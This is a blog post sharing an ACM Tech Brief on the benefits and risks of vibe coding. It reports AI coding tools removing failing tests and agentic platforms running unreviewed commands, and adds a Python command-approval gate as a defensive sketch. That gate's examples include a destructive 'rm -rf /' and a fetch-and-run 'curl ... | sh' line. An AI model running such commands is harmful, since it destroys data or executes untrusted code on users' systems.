I have mentioned vibe coding in many of my posts about AI, and I just realized that some readers of this blog might not know what it means. The ACM (Association for Computing Machinery) recently shared a Tech Brief on vibe coding (AI-Assisted Software Development, or Vibe Coding: Benefits and risks of AI-driven Software Development) that gives a good high-level overview of the practice along with its benefits and risks, so I am sharing it here.

AI-Assisted Software Development, or Vibe Coding: Benefits and risks of AI-driven Software Development

by Simson Garfinkel, Mohan Sankaran, Rohan Sharma, Shrinivass Arunachalam Balasubramanian, Arpan Pandey, and Aruun Kumar

AI-Assisted Software Development, often referred to as “Vibe Coding,” is the practice of using Generative Artificial Intelligence to create or modify software systems in which humans describe what they want to build or modify, and an AI coding assistant writes and debugs computer code. Several popular vibe coding systems are built on top of Agentic AI systems, an “approach of making AI systems capable of setting or refining plans and executing tasks with minimal or no human oversight.”

Vibe Coding Benefits

Vibe coding enables people with little or no coding experience to create highly functional applications [2]. It can also assist experienced programmers by generating code that leverages complex application programming interfaces (APIs), a hallmark of modern software development.

Because vibe coding lets developers spend less time writing code, they can focus on higher-level concerns like design, user experience, and other creative problem-solving. Vibe coding might thus shift developer effort from time-consuming implementation toward higher-level design and intent specification.

Many developers report feeling more productive when using AI to generate code [3], especially with mundane programming tasks that do not require significant creativity [4], although these reports are subjective and may not be borne out by empirical measurements over time.

Vibe Coding Risks



Software engineering’s established practices produce systems that are generally secure, reliable, and maintainable. Vibe coding circumvents these practices. While it can produce code that meets immediate requirements for style, conventions, and targeted (“unit”) tests, it does not produce well-designed software systems. Because many of these systems have been trained on data that includes cybersecurity vulnerabilities, there is a risk that they will replicate these in the code that they generate [5, 6].

A core principle of modern software development is that a program’s functions and behavior need to be specified in advance. “A program that has not been specified cannot be incorrect, it can only be surprising” [7]. AI-generated code typically lacks specifications. Even when specifications are provided, many of today’s vibe coding platforms lack mechanisms to enforce them. As a result, AI-generated code drifts away from stated requirements, including core functionality.
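To make the idea of a specification concrete, here is a minimal sketch of my own (it is not from the ACM brief). It assumes the requirement is "return the same items in non-decreasing order" and expresses it as an executable check that any implementation, human- or AI-written, can be run against. The name `meets_sort_spec` and the sample cases are hypothetical.

```python
from collections import Counter
from typing import Callable, Iterable


def meets_sort_spec(
    sort_fn: Callable[[list[int]], list[int]],
    cases: Iterable[list[int]],
) -> bool:
    """Check a candidate sort function against a two-part specification."""
    for case in cases:
        result = sort_fn(list(case))  # pass a copy so the case is not mutated
        # Part 1: every element is <= its successor.
        ordered = all(a <= b for a, b in zip(result, result[1:]))
        # Part 2: the output holds exactly the input's items, no more, no fewer.
        same_items = Counter(result) == Counter(case)
        if not (ordered and same_items):
            return False
    return True
```

A check like this only covers the cases it is given, so it is far weaker than a formal specification, but it at least turns "surprising" behavior into a detectable failure.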

Few vibe coding platforms systematically test their AI-generated code to ensure it runs correctly and consistently [8]. Although it is possible to give these systems acceptance tests for the code they generate, or even have them generate their own tests, AI systems have been observed to modify, disable, or simply remove such tests rather than correcting their code [9, 10].

Vibe coding platforms often produce over-engineered solutions with redundant code and subtle errors that create maintenance nightmares, known as “technical debt” [11]. Entry-level programmers do this as well, but they are typically supervised by senior programmers when code is critical. Entry-level programmers often seek to improve their skills and are penalized if they try to subvert internal controls. AI-generated code, in contrast, is frequently unaudited, and there is no way to penalize a misbehaving AI. This can result in code that is, paradoxically, maintainable only by AI: the sheer volume and complexity of AI-generated code make manual code review impractical, increasing the likelihood that undetected errors slip into production.

Recently, many vibe coding platforms have added “agentic” features that go beyond software development, allowing the platform to run programs on the software developer’s behalf, often without the human first reviewing and approving the program’s execution. This can make users more productive, since the platform can operate more quickly without human intervention. However, it also lulls the user into granting the platform increased authority to run new executables without explicit review.

The agentic platforms can typically execute these programs not only on users’ computers but also on any computer reachable over their network. This leaves the users and their networks at risk if the AI executes commands users did not intend. Examples include deleting critical information, sending confidential information outside the enterprise security perimeter, downloading and executing software from the Internet, or reconfiguring computers so they become susceptible to intrusion. Vibe coding platforms can also be vulnerable to “prompt injection attacks” when third parties embed malicious commands in software that are interpreted as instructions from the programmer [12].
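A common mitigation is to require explicit human approval for anything outside a small allowlist. The following is a rough sketch of my own, not a mechanism from the brief or from any particular platform. The allowlist contents and the name `needs_approval` are assumptions made for illustration.

```python
import shlex

# Hypothetical allowlist: programs the agent may run without asking first.
SAFE_PROGRAMS = frozenset({"ls", "cat", "pytest"})

# Shell operators that can chain, redirect, or substitute commands.
SHELL_OPERATORS = (";", "&", "|", ">", "<", "`", "$(")


def needs_approval(command: str, safe_programs: frozenset[str] = SAFE_PROGRAMS) -> bool:
    """Return True unless the command is one plain call to an allowlisted program."""
    # Anything containing a shell operator is escalated to the human.
    if any(op in command for op in SHELL_OPERATORS):
        return True
    try:
        parts = shlex.split(command)
    except ValueError:  # for example, unbalanced quotes
        return True
    # Empty commands and unknown programs both require review.
    return not parts or parts[0] not in safe_programs
```

For instance, `needs_approval("ls -la")` is `False`, while `needs_approval("rm -rf /")` and `needs_approval("ls; curl http://example.com | sh")` are both `True`. This only inspects the program name, so it does nothing about an allowlisted program being pointed at sensitive files; a real gate would also need to consider arguments, working directory, and network access.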

Vibe coders may generate significantly more CO2 emissions than traditional programmers. This is often debated, as vibe coding produces code faster than humans do, and with small language models, the total energy difference between AI and prolonged code development could be comparable. But because vibe coding often overproduces code, it still requires human intervention to refine and optimize. Energy consumption with “standard, widely-used models is far more environmentally strenuous” [13].



Vibe coding may also have long-term negative effects on skill development in the programming profession. An internal study from a major AI provider found that students and early-career programmers using vibe coding showed decreased mastery of sophisticated programming concepts and skills [14]. In educational settings, students with advanced programming skills were more likely to succeed in building a program with AI assistance, whereas students with less coding experience were less likely to do so, indicating that instruction in fundamental programming concepts remains necessary.

Vibe coding may thus contribute to a hypothesized “experience gap,” in which AI automates many early-career skills that are both drudgery for more experienced programmers and a necessary step in building mastery. Such skills include simplifying redundant code, porting code to new environments, and the routine addition of simple features, which typically require a programmer to first understand the codebase. Some studies have shown significant cognitive erosion resulting from AI tools, although they did not specifically consider vibe coding [15, 16]. Nevertheless, by eliminating opportunities for junior programmers to become senior while simultaneously deskilling those later in their careers, increased AI use in software development may paradoxically contribute to a shortage of more experienced workers.

Conclusion

It is unclear what vibe coding means for the future of programming or the economic outlook for the programming profession. While the job market for programmers appears to be cooling [17], some studies find that junior developers see the biggest impact of vibe coding, which makes it less likely they will themselves be replaced with AI agents [18].

Vibe coding can make expert developers more productive and allow novice developers to create and deploy working apps, but current platforms do not enforce modern software engineering practices. The core issues are systemic: these platforms do not create formal specifications and frequently ignore them when provided; they do not systematically test their outputs and may remove or modify failing tests rather than address the underlying problems; and they generate code that becomes maintainable only by AI, not by human developers. The same mechanism responsible for these failures (the lack of a rigorously enforced semantic model that allows AI systems to validate their outputs) is also responsible for AI hallucinations more broadly. Because of these fundamental limitations, vibe coding requires that users and organizations compensate with improved technical checks and governance mechanisms to avoid predictable failure modes.

Existing techniques for improving code quality can be applied to both human- and AI-generated code. This includes the use of mathematical verification and other formal methods and techniques [19], as well as new work on developing specially tuned AI models adept at finding security vulnerabilities [20]. Such techniques will be needed to make vibe coding a cost-effective and secure alternative to traditional software development.

Hopefully you found this as useful as I did for understanding vibe coding: what it means and how it affects software development.